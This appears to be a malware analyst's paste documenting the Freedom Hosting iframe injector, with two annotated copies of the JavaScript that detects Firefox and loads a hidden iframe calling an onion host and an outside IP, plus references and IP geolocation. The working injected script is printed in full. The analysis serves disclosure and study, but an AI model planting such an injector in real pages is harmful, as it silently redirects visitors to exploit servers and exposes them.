Freedom Hosting FBI IFRAME Redirector Malware Script

1. # MalwareMustDie!
2. # This is the malicious Javascript set codes injected to the Freedom Hosting site
3. # It contents the IFRAMER Malware method to redirect the victim to infector site, in url:
4. # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
5. #
6. # Original copy at: www.twitlonger.com/show/n_1rlo0uu
7. # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!
8. # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.
9. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
10. # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
11. # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
12. # Ref: http://www.twitlonger.com/show/n_1rlo0uu
13. # Ref: http://pastebin.com/bu2Ya0n6
14. # Ref: http://pastebin.com/pmGEj9bV
15.  
16. Additional: Analysis of Magento exploit payload used in infect Tor visitors, lead to the SAME IP:
17. # Ref: https://pastebin.com/RTwsyrH8
18. # Ref: https://pastebin.com/aFUP2gLB
19.  
20.  
21. // Case 1
22.  
23.     function createCookie(name,value,minutes) {
24.             if (minutes) {
25.                     var date = new Date();
26.                     date.setTime(date.getTime()+(minutes*60*1000));
27.                     var expires = "; expires="+date.toGMTString();
28.             }
29.             else var expires = "";
30.             document.cookie = name+"="+value+expires+"; path=/";
31.     }
32.      
33.     function readCookie(name) {
34.         var nameEQ = name + "=";
35.         var ca = document.cookie.split(';');
36.         for(var i=0;i < ca.length;i++) {
37.             var c = ca[i];
38.             while (c.charAt(0)==' ') c = c.substring(1,c.length);
39.             if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
40.         }
41.         return null;
42.     }
43.      
44.     function isFF() {
45.         return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
46.     }
47.      
48.     function updatify() {
49.         var iframe = document.createElement('iframe');
50.         iframe.style.display = "inline";
51.         iframe.frameBorder = "0";
52.         iframe.scrolling = "no";
53.         iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
54.         iframe.height = "5";
55.         iframe.width = "*";
56.         document.body.appendChild(iframe);
57.     }
58.      
59.     function format_quick() {
60.         if ( ! readCookie("n_serv") ) {
61.             createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
62.             updatify();
63.         }
64.     }
65.      
66.     function isReady()
67.     {
68.         if ( document.readyState === "interactive" || document.readyState === "complete" ) {
69.      
70.             if ( isFF() ) {
71.                 format_quick();
72.             }
73.         }
74.         else
75.         {
76.             setTimeout(isReady, 250);
77.         }
78.     }
79.     setTimeout(isReady, 250);
80.  
81.  
82. // Case 2
83.  
84. function createCookie(name, value, minutes) {
85.     if (minutes) {
86.         var date = new Date();
87.         date.setTime(date.getTime() + (minutes * 60 * 1000));
88.         var expires = "; expires=" + date.toGMTString();
89.     } else var expires = "";
90.     document.cookie = name + "=" + value + expires + "; path=/";
91. }
92.  
93. function readCookie(name) {
94.     var nameEQ = name + "=";
95.     var ca = document.cookie.split(';');
96.     for (var i = 0; i < ca.length; i++) {
97.         var c = ca[i];
98.         while (c.charAt(0) == ' ') c = c.substring(1, c.length);
99.         if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
100.     }
101.     return null;
102. }
103.  
104. function isFF() {
105.     return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
106. }
107.  
108. function updatify() {
109.     var iframe = document.createElement('iframe');
110.     iframe.style.display = "inline";
111.     iframe.frameBorder = "0";
112.     iframe.scrolling = "no";
113.     iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY
114.     iframe.height = "5";
115.     iframe.width = "*";
116.     document.body.appendChild(iframe);
117. }
118.  
119. function freedomhost() {
120.     if (!readCookie("n_serv")) {
121.         createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
122.         updatify();
123.     }
124. }
125.  
126. function isReady() {
127.     if (document.readyState === "interactive" || document.readyState === "complete") {
128.         if (isFF()) {
129.             //window.alert(window.location + "Firefox Detected.")
130.             freedomhost();
131.         }
132.     } else {
133.         setTimeout(isReady, 250);
134.     }
135. }
136. setTimeout(isReady, 250);
137.  
138. // Noted, same method,
139. // second script is w/IP info callback, contacting remote host as per marked (1)
140.  
141.   IP Address: 65.222.202.53
142.   City: Triadelphia
143.   State or Region: West Virginia
144.   Country: United States
145.   ISP: Verizon Business
146.   Latitude & Longitude: 40.0900-80.6220
147.   Domain: verizonbusiness.com
148.   ZIP Code: 26059
149.  
150. ---
151. #MalwareMustDie! @unixfreaxjp